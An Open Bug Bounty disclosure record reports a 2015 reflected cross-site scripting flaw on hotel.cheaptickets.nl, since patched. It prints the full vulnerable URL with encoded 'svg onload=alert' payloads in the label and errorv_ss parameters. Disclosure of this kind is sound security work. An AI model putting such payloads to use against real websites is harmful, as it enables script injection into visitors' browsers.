hotel.cheaptickets.nl XSS vulnerability

2015-11-01T10:08:00
ID OBB:99043
Type openbugbounty
Reporter retr0
Modified 2015-11-01T10:11:00

Description

Vulnerable URL:
http://hotel.cheaptickets.nl/index.en-gb.html?label=lol%22--%3E%3Csvg%20onload=alert%28%27XSSPOSED%27%29%3E-chp-home-menu-mob;sid=f77020a931cc1c9c7dbf450177c2fff4;dcid=4;bb_ltbi=0;sb_price_type=total&;errorc_searchstring_not_found=ss;errorv_offset_unavail=1;errorv_no_rooms=1;errorv_ssb=empty;errorv_label_click=undef;errorv_si=ai%2Cco%2Cci%2Cre%2Cdi;errorv_ss=%22--%3E%3Csvg%20onload%3Dalert%281%29%3E;errorv_idf=1;errorv_error_url=http%3A%2F%2Fhotel.cheaptickets.nl%2Findex.en-gb.html%3Flabel%3Dtravix-chp-home-menu-mob%3Bsid%3Df77020a931cc1c9c7dbf450177c2fff4%3Bdcid%3D4%3Bbb_ltbi%3D0%3Bsb_price_type%3Dtotal%26%3B;errorv_review_score_group=empty;errorv_src=index;errorv_room1=A%2CA;errorv_class_interval=1;errorv_csflt={};errorv_sb_price_type=total;errorv_group_adults=2
Details:

Description| Value
---|---
Patched:| Yes, at 22.11.2015
Latest check for patch:| 22.11.2015 17:32 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check hotel.cheaptickets.nl SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 1 November, 2015 10:08 GMT
Vulnerability existence verified and confirmed| 1 November, 2015 10:11 GMT